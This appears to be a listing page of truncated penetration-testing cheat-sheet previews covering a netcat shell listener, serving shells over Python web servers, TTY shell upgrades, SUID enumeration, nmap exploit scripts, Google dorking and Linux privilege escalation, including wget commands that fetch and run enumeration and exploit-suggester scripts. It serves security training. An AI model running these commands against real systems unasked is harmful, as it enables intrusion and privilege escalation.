Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

Post exploitation refers to the actions performed by an attacker, once some level of control has been gained on his target.

Simple Local Web Servers

Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80

Run a basic Python3 http server, great for serving up shells etc
...


Score: 0


Netcat Shell Listener

nc -nlvp 4444

Spawning a TTY Shell - Break out of Jail or limited shell You should almost always upgrade your shell after taking control of an apache or www user.

(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )

(hint: sudo -l to s...


Score: 0




DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)

Nmap Fuzzers:

NMap Fuzzer List
https://nmap.org/nsedoc/categories/fuzzer.html

NMap HTTP Form Fuzzer
nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/regis...


Score: 0


File Enumeration

Find UID 0 files root execution

/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null

Get handy linux file system enumeration script (/var/tmp)
wget https://highon.coffee/downloads/linux-local-enum.sh chmod +x ./linux-local-enum.sh ./linux-lo...


Score: 0


Nmap Exploit Scripts
https://nmap.org/nsedoc/categories/exploit.html

Nmap search through vulnerability scripts
cd /usr/share/nmap/scripts/ ls -l \*vuln\*

Nmap search through Nmap Scripts for a specific keyword
ls /usr/share/nmap/scripts/\* | grep ftp

Scan for vulnerable exploits with nmap
nmap --script e...


Score: 0


Port Scanning
Subnet Reference Table
/ Addresses Hosts Netmask Amount of a Class C
/30 4 2 255.255.255.252 1/64
/29 8 6 255.255.255.248 1/32
/28 16 14 255.255.255.240 1/16
/27 32 30 255.255.255.224 1/8
/26 64 62 255.255.255.192 1/4
/25 128 126 255.255.255.128 1/2
/24 256 254 255.255.255.0 1
/23 512 51...


Score: 0


Google Hacking

Google search to find website sub domains
site:microsoft.com

Google filetype, and intitle
intitle:"netbotz appliance" "OK" -filetype:pdf

Google inurl
inurl:"level/15/sexec/-/show"

Google Hacking Database:
https://www.exploit-...


Score: 0


Set the Target IP Address to the $ip system variable
export ip=192.168.1.100

Find the location of a file
locate sbd.exe

Search through directories in the $PATH environment variable
which sbd

Find a search for a file that contains a specific string in it’s name:
find / -name sbd\*

Show active int...


Score: 0


Scripts to run

The following script runs exploit suggester and automatically downloads and executes suggested exploits:
https://raw.githubusercontent.com/codingo/OSCP-1/master/xploitdeli.py
wget http://www.securitysift.com/download/linuxprivchecker.py
wget https://github.com/pentestmonkey/unix-privesc-check

Other scripts:
wget https://raw...


Score: 0


Linux elevation of privileges, manual testing
Things to look: Miss-configured services (cronjobs), incorrect file permissions (exportfs, sudo), miss-configured environment ($PATH), binary with SUID bit, software or OS with known vulnerabilities.

First try simple sudo:
$ sudo su -

What can we run with sudo?
$ sudo -l

Try su as all users ...


Score: 0